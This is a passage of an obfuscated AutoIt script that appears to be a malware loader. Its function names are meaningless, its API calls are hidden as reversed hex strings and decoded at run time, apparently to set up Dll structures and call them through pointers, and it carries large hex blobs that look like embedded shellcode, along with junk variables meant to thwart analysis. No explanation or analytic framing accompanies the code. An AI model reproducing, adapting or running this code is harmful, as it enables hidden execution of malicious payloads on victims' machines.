  358. LOCAL $KKVUIRTRHPYHIVQLHWSGTWU = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "225303439353634464640353340343343383646464645464031353834483734464640353646464646364344453834483035364646464446443935383448303530343935363446464035334034334338364646464446422026202A7A69696A7E67667A62776B656C637D686966742x0" ) ) )
  359. LOCAL $QLJNWBXIQHUVYZN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22345443245383448303536464646454644363538344830353034393536344646403533403433433836464646454644363538344837344646403536464646443644344538344830353646464645464031353834483032202620257774776377786C617679686970786274727965767B6B642x0" ) ) )
  360. LOCAL $YVYTXUHJAZPB = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228364646464446434545383448373446464035364646464545434245383448303536464646454643444538344830353034393536344646403533403433433836464646454643444538344837344646403536464646422026202E6A7976757861796872677E6A6C61742x0" ) ) )
  361. LOCAL $SMQCGNPEJZEXQJHIANARL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2283235383448303530343935363446464035334034334338364646464546483235383448373446464035364646464236434345383448303536464646444643454538344830353034393536344646403533403433433220262022607A716A68657874797679742x0" ) ) )
  362. LOCAL $UYWIZZAJBINHZFWAEOHJUEYRBDNN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226403536464646403644334538344830353646464645464838353834483035303439353634464640353340343343383646464645464838353834483734464640353646464641454341453834483035364646464546422026202C62716E6169686A6178756A7A65607E6763617D63742x0" ) ) )
  363. LOCAL $YJNZYQXOTUHOPVHRQP = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228354646464646354349353834483340343343383734464640353646464648354431453834483035364646464546443645383448303539353034363446464035334034334338364646464546443645383448373446422026202E6E6462627975657A686F656167766A786E69626A616A7A79677975742x0" ) ) )
  364. LOCAL $REKIVZSIQQZFGVMMKSVOJIHIGJG = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220353730334538334035343938364646464245454938354646464644354439353834483031353439383646464642454341483546464646423643434538344835403537303345383031353439383646464642454542422026202071727866707F6865747F6871797A7E6A69742x0" ) ) )
  365. LOCAL $TUYWHALMICQNNGPZHONNL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22646424543463835464646464145434145383448354035373033453834313534393836464646424545473835464646464636434445383448334035343938364646464245434838354646464645454342453834483542202620276A676968696A6F66737B6D6D6677666A717179637A76796B6562742x0" ) ) )
  366. LOCAL $CCLPVCGIWCBMSZNRTRFVJDJTEIHT = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "225464646464345443245383448383135343938364646464245434438354646464640364433453834483540353730334538383135343938364646464245454538354646464644364434453834483431353439383646422026202C6E6E6F686A70776E6E6173696D6C616867797574742x0" ) ) )
  367. LOCAL $JATTVVRRN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2203642483646464641454237383540353646464646464345353834483431344532483341353439383646464642454342383546464646483544314538344835403537303345383341353439383646464642454543383220262024786965647A646A66766274727E6A737D62636779676366707C6363642x0" ) ) )
  368. LOCAL $HLYEEMA = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "225403536464646434644383538344836464646483644354538393834313445324837344646403536464646464648313538344838364248364646464145413638354646464648364835453249383035334145343448322026202E627276767474716A642x0" ) ) )
  369. LOCAL $PBUHBHNXISBYSSKNUNYWJHQ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22345453434483035364646464246443445383448303030303030343345383938363446464035373446464035334545343448303536464646414644323538344830303030313038323538393836464646414541343832202620216D6565697C68642x0" ) ) )
  370. LOCAL $XHVEMFHQFRJECNARB = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2243448303536464646434644393538344830303030303034324538393836344646403537344646403533454534344830353646464644464435353834483030303030303033453839383634464640353734464640353220262021786A67797E657E6B637379726379687E686268657260742x0" ) ) )
  371. LOCAL $NWLDTSZVWYD = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220353646464643464431353834483030303030303032453839383634464640353734464640353345453434483035364646464246483835383448303030303030383245383938363446464035373446464035334545322026202262716E63656A62766178666D65667868742x0" ) ) )
  372. LOCAL $RFPQHL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22646464146443835383448303030303030334245383938363446464035373446464035334545343448303536464646434644364538344830303030303033414538393836344646403537344646403533454534344832202620246977767A7374746C677E642x0" ) ) )
  373. LOCAL $XZFCBRBBWHINHZ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226464346443445383448303030303130343435383938364646464935434738354035364646464936403435383448303030303030383145383938343134453248363446464035373446464035334545343448303536422026202C6861707662742x0" ) ) )
  374. LOCAL $UVWJNWMDPWJPHDZZBTWRQA = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226464649354634383540353646464642464031353834483030303031303432353839383646464649354835383540353646464644464343453834483030303030303035453839383646464649354146383540353646422026202A786E6968677262627263666A78742x0" ) ) )
  375. LOCAL $LZLEKBXKQHOYIVJGDK = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220303030303033493538393836464646493542323835403536464646444644303538344830303030313034303538393836464646493544333835403536464646464643453538344830303030303033454538393836422026202161727774726A7A7468607A6770746D677E6A677675742x0" ) ) )
  376. LOCAL $YTKJTLKXBXGPQQJUJX = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "225464548354035364646464446443835383448303030303030334445383938364646464935413038354035364646464446434445383448303030303130383035383938364646464935433138354035334145343448322026202B64676A6679697F68617B68726B656C6A7C642x0" ) ) )
  377. LOCAL $XIMKGEFBAIUEPUQLSWPCFA = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22538393836464646483549334835454442483035334345343448303030303130343335383938334035373248364646464835444448354035364646464646403335383448303030303030343445383938364646464832202620287A657A617170776872687B6C647A6B6479742x0" ) ) )
  378. LOCAL $UMZZEBQYPOLLJU = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226464649364341453834483030303031303435353839383646464648354831483540353646464646464347353834483030303031303035353839383646464648354142483540353438353434483030303031303834322026202166636077737C61757075657961626665676B6D6968742x0" ) ) )
  379. LOCAL $YNNGDSKB = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22646464648354237383540353646464645464347353834483030303030303836453839383646464648354438383540353646464649364439353834483030303030303838353839383646464648354639383540353642202620257A6C6C6F60797172656A7A7D65742x0" ) ) )
  380. LOCAL $DXHLZEXNEHSWOZLGZEKCTGSEKVN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22830303030303038393538393836464646483545443835403536464646424643493538344830303030313030313538393836464646483540363835403536464646444644363538344830303030303034393538393832202620226B6374676E6E69742x0" ) ) )
  381. LOCAL $FIJZNPSJCR = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220303030303034354538393830303030303030303835453143383646464648354142383540353646464642464032453834483030303031303038353839383646464648354343383540353646464643464430353834422026202E667B65637764736B656A776C6A7F677378656E68756A7C686874642x0" ) ) )
  382. LOCAL $SBMAB = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2253646464642464036353834483030303031303036353839383646464647354646483540353646464641464346453834483030303030303833453839383646464648354131383540353646464643464435353834483220262022736A63707E6A7A6966642x0" ) ) )
  383. LOCAL $JETNFYCGGZHIHXFDBDRSEVHFHWQ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2293836464646473549334835403536464646464643403538344830303030313030303538393836464646473542444835403536464646454640344538344830303030313034373538393836464646473544454835403220262022616D6263742x0" ) ) )
  384. LOCAL $JPHCYBRWNKXQOCBCZFHKMWN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2283448303030303030334835383938364646464735453148354035364646464246434435383448303030303030303145383938364646464735473248354035364646464446443235383448303030303130334135383220262021777866686675637274626466687869686A77676369766E64756A642x0" ) ) )
  385. LOCAL $RYUIXNWOFJITRZWJ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228354035364646464936443235383448303030303030303645383938364646464735413838354035364646464936434445383448303030303030343645383938364646464735433938354035364646464936443345322026202E677D6B68666A7362636F61787B6E677272697368607A642x0" ) ) )
  386. LOCAL $GQARTDMDPCSHZZ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "223453839383646464647354244383540353646464642464435453834483030303030303431453839383646464647354445383540353646464649364837353834483030303031303837353839383646464647354646322026202A677A7274796A666F677E6879657972742x0" ) ) )
  387. LOCAL $LDMBPDDTUIRWRHFJKDDWAULF = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "224373538344830303030313033473538393836464646473547323835403536464646414648393538344830303030303033464538393836464646473549333835403536464646454640314538344830303030303033422026202A7A78637360746D646472716177642x0" ) ) )
  388. LOCAL $UOLRSUUOOGYEGQJSFMVRAXLFXG = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22541364835403536464646444644333538344830303030313033453538393836464646473543303835403536464646424644323538344830303030313034363538393836464646473545313835403536464646434642202620266C65716774646B6A6668627772796574746460726D646C642x0" ) ) )
  389. LOCAL $SPEDZQRHGBSMBZNCHLJACTTK = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "221303340353839383646464646354443483540353646464645464430353834483030303031303835353839383646464646354644483540353646464642464833353834483030303031303831353839383646464646322026202768766C687162767D66637A61776569776F6F657573727C6F65742x0" ) ) )
  390. LOCAL $RNZUEXCGULCFJLGHMZJIATLWD = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226483643454538344830303030303030393538393836464646463549314835403536464646414643414538344830303030313033463538393836464646463542424835403536464646414643433538344830303030322026202B647473616A6C68636E6A726D6372676862717A74656073742x0" ) ) )
  391. LOCAL $XPAWWDYVULLRXCJZMRPWHSVFBN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2283540353646464643464432453834483030303031303833353839383431344532483646464646354538383540353646464644464431353834483030303031303431353839383646464646354739383540353646464220262024677C6471696A6A7D68676C6A66636C6577636875657A7E62742x0" ) ) )
  392. LOCAL $CKLJXCCQGHCJXIEKPAVQPXAIOBVZ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228303030303130334235383938364646464635403538354035334835343448303030303130303335383938364646464635464538354544424830353834453434483030303030303834453839383646464646354037322026202E62666673786770727D6A7A6368727C6C657679746777716078742x0" ) ) )
  393. LOCAL $VFUVVJAOJKNI = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220353646464649364830353834483030303031303836353839383646464646354342383540353646464641464435353834483030303031303034353839383646464646354543383540353646464646464346353834422026202A76726F69616870717671607B6569687A636867617363687A6C6B63642x0" ) ) )
  394. LOCAL $OHVBXC = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22439383646464645354636483540353646464641464434453834483030303030303438353839383646464646354830383540353646464641464346353834483030303030303038353839383646464646354141383542202620296E6B6A6F616A6676757666742x0" ) ) )
  395. LOCAL $UHSXD = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2283540353646464641464340353834483837353439383646464645354534483540353646464649364345353834483030303031303037353839383646464645354735483540353646464643464435453834483347353220262023687266786F642x0" ) ) )
  396. LOCAL $VJKYFKCVWHCUBNHNOHQBEMMBHBY = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226464646464437353834483346353439383646464645354831483540353646464645464341453834483037353439383646464645354732483540353646464649364436453834483437353439383646464645354633422026202468737865742x0" ) ) )
  397. LOCAL $LLGNHYCYLKKVDGPRB = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22346443145383448343635343938343134453248364646464836483545393646403537344646403530354534344830353646464645464034353834483030303031303343353839383646464645354939383540353642202620297268626D6D656261786F6E686E626573686776736B66697B6A66742x0" ) ) )
  398. LOCAL $MMUOQOGACVYJXIQDLRJQTVVYOV = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228393836464646453543443835403536464646464644353538344833453534393836464646453542453835403536464646414640334538344830363534393833403445324836464646453544463835403536464646422026202262707764667B6B6C697369786E676C6C642x0" ) ) )
  399. LOCAL $DDLMVOULPUHKVWANEDDPNBURSPFBH = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22646453546413835403536464646464648343538344834353534393836464646453545423835403536464646414648354538344838353534393836464646453544433835403534393534344830303030303030344532202620267F69767674717A627C646179687A69767361676F617F657D6D642x0" ) ) )
  400. LOCAL $QRVZUL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2283646464644354636483548344248373446464035303545343448303536464646454648324538344838363534393836464646453544403835403536464646434644334538344830303030313033443538393836464220262028626660737275726E607464656E6167767B6865707C657F667D6C6464642x0" ) ) )
  401. LOCAL $COQAJOMTV = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228334835483442483734464640353035453434483035364646464346443635383448383435343938364646464435464448354834424837344646403530354534344830353646464642464433453834483035353439322026202C657A767271742x0" ) ) )
  402. LOCAL $VBVNPGQ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2264435464938354035364646464246443645383448334435343938383134453248364646464435413248354834424837344646403530354534344830353646464643464434353834483434353439383646464644354220262026747D6F6A61617F63642x0" ) ) )
  403. LOCAL $SVYHBJUUFJTDYDMKBKXYOCUBBIY = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228354035364646464546443345383448334335343938364646464435413838354035364646464646434335383448383335343938364646464435403938354035364646464646443235383448343335343938364646422026202177607E667266742x0" ) ) )
  404. LOCAL $VQTSLAZYZBMKTUWUA = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226464646464836443545324646403536464646424644373538344830333534393836464646483648354539364646464646483644354532464640353646464643464432353834483034353439383646464644354237322026202979626265736F69787B626B6D646974647A6665757A6268697673742x0" ) ) )
  405. LOCAL $UIUSJQUCSICPBXGSLYDM = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2293834313445324836464646443545323835403536464646444644343538344838323534393836464646443544333835403536464646434644333538344833423534393833403445324836464646483648354539364220262021657775747B6D626A797A716C63747176742x0" ) ) )
  406. LOCAL $QICYEMJPZDESITHSNGMAZPS = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "227334541383345424835353130334732334933424535453645353143364836424833403537344839353830353432483032353439383545314636464646443543313835403536464646444644373538344834323534322026202D64697C63776872607369637365717A63757965742x0" ) ) )
  407. LOCAL $SXJYEG = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2244830303030313034303836303134334338303030303130334435393646403536464646493648383538344838303537364640353034303030303130343335393646483035373646473536353335303030303630334220262023707A716D676E637864796375646A707A6D6569736961742x0" ) ) )
  408. LOCAL $SIVSIJLGWNWHFCODKHHPN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228383444473938334644473938303544473938303538354534344830313146364643333343333732483340344532483030303031303834353936464035364646464936483835383448303536464646454640363538322026202765697A6873742x0" ) ) )
  409. LOCAL $EEMCMBPJBVOEIHVJZ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "225393646403536464646424640393538344830303030323033434836303030303130334335393646403536464646464648363538344834343146303030303130334335393646433643303344444739383836444739322026202E6078686B646F636668677E67776C6A6963767963742x0" ) ) )
  410. LOCAL $AJVMRSQSUM = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "229364640353646464645464036353834483735373537353735383030303030334038363735373530353646464646464836353834483035383545343448354235373030303035343035354331383030303031303343322026202A7A667869656F66726A60726D636D6565642x0" ) ) )
  411. LOCAL $DPMCQOSNDIPVI = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "227353030303031303347353936464835453736464735303534324534344838313146373531303038323349334245354536453033433330303030313038323539364643353031353730334538303030303130334235322026202D65737173727D667A61642x0" ) ) )
  412. LOCAL $VWUSHCWVTU = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2243248334242454030303031303345353936464835453736464735334039373033453830303030313030383539364648303447393838354537364640353830303343383832453432483035383035343448343031463220262029667079646E637F61736D6074642x0" ) ) )
  413. LOCAL $LHYUANMWKROMUOSXQQU = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2203036413836373530353034453434483034453439383034314638303030303030303836373530353634324835444837303345383030303031303346353936464835453736464035354035373433363432433830353220262025747677736863757776742x0" ) ) )
  414. LOCAL $RAJEAZQXAIQYRKVBUS = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2264146303533464534344837353735373530353834453434483834453439383230314637353034314630344534324835324837303345383030303031303438353936464434444739383035303545343448303036403220262025717178737F657D6F627B677D6E616579786C642x0" ) ) )
  415. LOCAL $TRZRMF = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22835453736464035314037373035363432433640323734333634324338303534324833444534393830344534324838364534393834333634324830393837303345383030303031303837353936464035453736464642202620237572667B627971796168717A71656A6162742x0" ) ) )
  416. LOCAL $EUJBGZKLFABTCDXVKQMNT = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22648354537364647353141393730334538303030303130383735393646403545373646483545373646403538364534344837353735373530353344453434483230314637353034314630303030313033463539364642202620266D627A7274742x0" ) ) )
  417. LOCAL $SWBZMY = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22338303343333030303031303435353936464346453736464340353736464343324532483435363736464646464645464246493540303030313033463539364646464146334645373646403030303130334535393642202620247E6D617B66787463647261666C6B6A77626A6575642x0" ) ) )
  418. LOCAL $EWYUAODZGPOQAYETRIBZRVYH = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22030303130343535393646403533464534333038364334324830353346433736464340353433303330324830303030313033403330334934483340353432483233333736303634324336363435444739383340343342202620297D6A726773742x0" ) ) )
  419. LOCAL $JFYMLXHCTBFPHFA = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22646434344473938383545373646403538303033433838324534324830353836453434483430314630353343453434483834423734354534393338323333433834354534364643403433433836303634373246403032202620286976727A72696274756971617F60776A746F6165797775642x0" ) ) )
  420. LOCAL $FYDRFWZLPOZ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22038323634324836464646454642314838364030334538303030303130343635393646403031303030373036464646424640393538373343454537364640353646464642464039353834483030303031303037353932202620216668607662647368687C6D69766A642x0" ) ) )
  421. LOCAL $FTXMGJXR = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220303030313038363539364643454537364646464646464641333838364030334538373530303030313030363539364643454537364640353646464642464039353834483646464643464034353839383836453433322026202A7F607C6A777662746976642x0" ) ) )
  422. LOCAL $KVPQOIHLWZSPL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2283346424839353545314630303030313038373345413837353635333530303030333033464345413838364435433833454248353536464646454645423935483545343248364646464646464138383640303345383220262022787A676D687476642x0" ) ) )
  423. LOCAL $LHWAOETLKTJXL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "222483531433640313432334734483036424839353545314636464646423546364835453143364035303030303230343144323349393830303030313038383432343244483244433330303030343038303432343834422026202C60737A777C68696F6170767B642x0" ) ) )
  424. LOCAL $SOFGUWRPVFQIOIXKCMXZNULAMSFE = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220303031303036343234393646403536353030303031303348343234383448303539353030303031303833343234393646473032454634303030303130383334323439364641403537363536433543303838303537322026202C687A647B6C64756F6167786C642x0" ) ) )
  425. LOCAL $GABFTCQTGQEVYWPCGSZVW = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228354531433640353030303031303348343234324448303030303330343034323438344833403537364643464248393535453146303030303130383733454138393234473436324643383033433333403433433830322026202566637D616C657E6A787D636B68796F696176667072777577666F63742x0" ) ) )
  426. LOCAL $BHHLYXXCEUCRN = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2223034473640334241383342423430343233443448313533434343434343434343434343434343434343434343434343434030383032334445353542483245354536453234443730334538333436464646434646434220262027767A737763607779767561776471736476626167642x0" ) ) )
  427. LOCAL $JUDKOMSDDMHBBREJUTSJIFS = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220303030303030303030303030303030303030303030393542454030353830303030303130303442333344323430393830303248343939353133424831403237383342433646464640364030353234334248383343322026202E62736575636878797C686862642x0" ) ) )
  428. LOCAL $UTUFSQCVBEKMV = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030322026202376696A6374757A65627262686D6464637D6F6B64657A642x0" ) ) )
  429. LOCAL $ZVDNCSXVZKWFTTJBKHEECI = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303032202620267D6B65626673617376657475742x0" ) ) )
  430. LOCAL $HGJGVHJHG = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "220303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303220262029636565686B626A647476677B6A767873736E64667A742x0" ) ) )
  431. LOCAL $ZJNLAOMROXDJJQGQHQ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "D5220322B59222034387032202C2224627F677462202C2220303033387032202C2224627F677462202C29244444282E656C4972716E6962402C2224627F677462202C222032202C2224627F677462202C22236F6C6C614C61657472796652202C2222747072202C2222333C656E62756B62282C6C61634C6C644x0" ) ) )
  432. LOCAL $XXXJYVPPXNYLKDAZNUNOSYMCQF = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "9222D5220262029244444282E656C476E69627473502620222B5463717664353374666435317436602564797262282564716562734473657274735C6C644x0" ) ) )
  433. $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "927686a6866776a676864202c2226353661343562753764327a75343762743532202c2921786177617a6a64687f627d6f616c6e6a6a74202c222d522026202927686a6866776a676864282e656c4972716e6962402620222b56353661343562753764327a753437627435302564797262282564716562734473657274735c6c6448216471644475635473657274735c6c644x0" ) ) )
  434. $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "9244444202C22246371766435337466643531743662202C2661736D69737F6E657E6A71646B6C697E68707076797A6878787428216471644475635473657274735C6C644x0" ) ) )
  435. LOCAL $CMNQBAENUYAWWKNBTREXTHOHRHZXHZNYLUDHCGUKGFMC = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "9292661736D69737F6E657E6A71646B6C697E68707076797A68787874282274705475674473657274735C6C64402C2222747072202C292920505428276E696274735F645972716E69624825647573656875402C2222747372202C21786177617A6A64687F627D6F616C6E6A6A74202C2224627F67746228237375627464614C6C61634C6C644x0" ) ) )
  436. $4DSQF4QSDFDS = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "D5220322B592D5220322B536D66676B6577636864657C697E6A78687A7862786F686478756274726E6B67777169757E656162617E6D6364202C22256C646E616862202C222469437375636F627054756742202C2224627F677462202C2222333C656E62756B62282C6C61634C6C644x0" ) ) )
  437. $GS4 = $CMNQBAENUYAWWKNBTREXTHOHRHZXHZNYLUDHCGUKGFMC [ PZOOPVQSVQRD ( "0" ) ]
  438. ENDFUNC
  439. FUNC GXPSYWOWTB ( $LOOP , $TIME )
  440. DIM $AYUDERGFV = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  441. FOR $I = PZOOPVQSVQRD ( "0" ) TO $LOOP
  442. LOCAL $A = $ODFGOQSDOF ( $AYUDERGFV ( PZOOPVQSVQRD ( "9222535387032202C22283838703228244E414479624x0" ) ) )
  443. $A = $ODFGOQSDOF ( $AYUDERGFV ( PZOOPVQSVQRD ( "9222132202B202164202C216428225F4479624x0" ) ) )
  444. $ODFGOQSDOF ( $AYUDERGFV ( PZOOPVQSVQRD ( "9207F6F6C64202F20256D696474282075656C635x0" ) ) )
  445. NEXT
  446. ENDFUNC
  447. FUNC OVMTRRSWMS ( $A , $B , $XWWX )
  448. DIM $VFDS41DFS4 = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  449. LOCAL $D = $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "9216428276E696274735F645972716E69624x0" ) ) )
  450. $D = $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "924642825637275667562576E696274735x0" ) ) )
  451. DIM $TBYWFKILOZVHG = ISINT ( "dipkszseyuuuaodivcmctgixsvjmujvqflqpevyevfy" )
  452. GLOBAL $TYESLWBEJPDJNYXISV = 1.0727268160766508e-138
  453. DIM $YRMHZIEQROMCNY = - -1.710334923957834e+133
  454. LOCAL $GAQBUABTIEMXJYQDRGS = 261
  455. DIM $XTCRLNVCAWOIF = 8.409011485463492e-143
  456. DIM $FARXQTZUWHGSYILHFO = 2.1146417683492934e-253
  457. DIM $HNKJNGQHIXPE = "obeyakknjottpytgjewtzga"
  458. GLOBAL $YROVLRXYGJFUXUPOITYRJSQ = 1.383858382961825e-151
  459. DIM $KDRMZSCWZKTS = 261
  460. LOCAL $PMJHAES = "ppfybxzanaahxpvouywwrmtidl"
  461. LOCAL $STOVFEOFBGKBOFMGRCYXK = "A6469647A6C797A76646176"
  462. GLOBAL $YQJFALPERBHYSKWWRLESM = 24581
  463. GLOBAL $AGXAIB = 2238725
  464. GLOBAL $LWYQFWYNTLBTA = 5
  465. DIM $UWUGGMFDIY = -3.112849437490682e+275
  466. LOCAL $ZDLGDWPVCUT = "lfxzvjuxmhwxdzkovnetcwvaubklfmsow"
  467. IF $TBYWFKILOZVHG = 5 THEN
  468. LOCAL $FDSVG45SDF54GV = PZOOPVQSVQRD ( "00012C9CB5E5F589BE2460036D108057B8FFFFEF0FD048A8000000FF1E181C10706BF0E06BF060887068FFFFEF8EDB30FD9860A8FFFFEFCE5B30ED98FFFFEF8E5898000000FF52FFFFEF8E5830006BF0FFFFEFCE58308D98FFFFEFCE5898000000FF5204FFFFEFCE58B83667C05593AF98FF13FFFFEF0FD9D80BBECF54FFFFFFEF0F534888FFFFEF0FD348684FD7B8FFFFEF0F5348A8CF57B84F5498000000FF524F54308C10FFFFEF0FD0C86BF0CFD4B8006BF0015430290F577F2D13CF54B874D700001000CFD71800CF5638004F56383F2EFFFFEFFED0488810C28C88000010009B000000CD48F00C580F54988C928484EA2F7D98948C989C130155B875653500A600A60010018Cx0" )
  469. ELSE
  470. $GKJDFSKOPDFS &= $SDVQKJDFSJQDF ( $GKJFNDSQJKFQSJKLF ( "0x2466676e736b6a6471626e66735b537472696e674c656e282467736667697573696875667364696629202d2024695d" ) )
  471. ENDIF
  472. LOCAL $DSQF656SD5Q = $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "D5220322B59222034387032202C2224627F677462202C2220303033387032202C2224627F677462202C292164282E656C4972716E6962402B2029267764353664637534376673746664282E656C4972716E6962402C2224627F677462202C222032202C2224627F677462202C22236F6C6C614C61657472796652202C2222747072202C2222333C656E62756B62282C6C61634C6C644x0" ) ) )
  473. LOCAL $DSQ4DS4 = $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "9222D5220262029267764353664637534376673746664282E656C4972716E6962402620222B5564797262282564716562734473657274735C6C644x0" ) ) )
  474. LOCAL $DSQ4F8S5DQ = $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "9217534637635363661737464202C222D5220262029267764353664637534376673746664282E656C4972716E6962402620222B5564797262282564716562734473657274735C6C644x0" ) ) )
  475. $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "9267764353664637534376673746664202C21302C243374643173746428216471644475635473657274735C6C644x0" ) ) )
  476. LOCAL $4DFGBS54FDG = $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "9222D52202620292164282E656C4972716E6962402620222B5564797262282564716562734473657274735C6C644x0" ) ) )
  477. $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "9267764353664637534376673746664202C21302C217465337836643173746428216471644475635473657274735C6C644x0" ) ) )
  478. $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "92464202C21302C27646664353372676664643428216471644475635473657274735C6C644x0" ) ) )
  479. $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "920302C22247E6962202C29226428276E696274735F645972716E6962402C2222747372202C292464282E656C4972716E6962402C22247E6962202C29276466643533726766646434282274705475674473657274735C6C64402C2222747072202C217534637635363661737464202C2224627F67746228237375627464614C6C61634C6C644x0" ) ) )
  480. RETURN $ODFGOQSDOF ( $VFDS41DFS4 ( PZOOPVQSVQRD ( "921302C27646664353372676664643428216471644475674473657274735C6C644x0" ) ) )
  481. ENDFUNC
  482. FUNC PZOOPVQSVQRD ( $GSFGIUSIHUFSDIF )
  483. DIM $ZSXLGLGATZCDOUOZGT = STRINGREPLACE ( "yqanxmzwbtw" , "q" , "loqj" )
  484. GLOBAL $IFYWKLEADDHNP = "66E7571776E627864666C6179707775647A736868757A78796D7877"
  485. GLOBAL $XSOPZAHSIIQPIEBALTMCBNJ = "0x7571666B77626E766B626F717"
  486. LOCAL $UCAKNBKMVR = 5
  487. GLOBAL $YZKBMP = 14085
  488. LOCAL $WVVBCVTCRWKJXHFXGIVG = "0x3078364236323733373936313734373437323643364436343644373737383732363436373741"
  489. DIM $NNBYMT = -1.040010591538168e+210
  490. DIM $OXUVK = 2338565
  491. GLOBAL $YHRHHUZGQE = 16901
